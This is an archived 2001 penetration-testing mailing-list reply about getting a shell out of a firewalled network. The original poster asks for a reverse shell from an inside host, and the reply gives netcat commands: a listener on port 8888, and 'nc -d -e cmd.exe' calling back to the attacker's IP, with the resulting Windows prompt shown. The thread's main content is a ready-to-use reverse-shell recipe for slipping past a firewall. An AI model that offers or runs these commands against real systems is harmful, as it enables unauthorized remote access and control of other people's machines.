Re: Server initiated remote shell

From: Mike Brentlinger (mdbrentlingerat_private)
Date: Fri Sep 21 2001 - 13:54:35 PDT

Next message: Steve: "RE: Server initiated remote shell"

Previous message: Kurt Seifried: "Re: Modem identification"
Maybe in reply to: Ilici Ramirez: "Server initiated remote shell"
Next in thread: Steve: "RE: Server initiated remote shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

sending a shell back to yourself.

On your local computer run netcat in listen mode.
nc -l -p 8888

execute netcat on remote server such that it sends a connection back to you.

nc -d -e cmd.exe X.X.X.X 8888 (X.X.X.X is your IP)

The netcat listener you setup should display something
like this:
        Microsoft Windows [Version xxxx]
        (C) Copyright 1985-2000 Microsoft Corp.
        c:\>


-mdb



----Original Message Follows----
From: Ilici Ramirez <ilici_ramirezat_private>
To: pen-testat_private
Subject: Server initiated remote shell
Date: Fri, 21 Sep 2001 07:23:11 -0700 (PDT)

Hi,

Lets suppose that I can execute a program on an inside
host on a network protected by a firewall. There is no
way in. But there is a way out to www browsing on port
80.

So the client could connect to any Internet address on
port 80. What program should it execute to provide me
with a shell? Of course I'm in Internet with a
listener. What listener?

The firewall is a real statefull firewall so no TCP
ACK or ICMP encapsulations.

Have a nice weekend too.

Ilici R


__________________________________________________
Terrorist Attacks on U.S. - How can you help?
Donate cash, emergency relief information
http://dailynews.yahoo.com/fc/US/Emergency_Information/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Steve: "RE: Server initiated remote shell"
Previous message: Kurt Seifried: "Re: Modem identification"
Maybe in reply to: Ilici Ramirez: "Server initiated remote shell"
Next in thread: Steve: "RE: Server initiated remote shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Sep 21 2001 - 16:37:02 PDT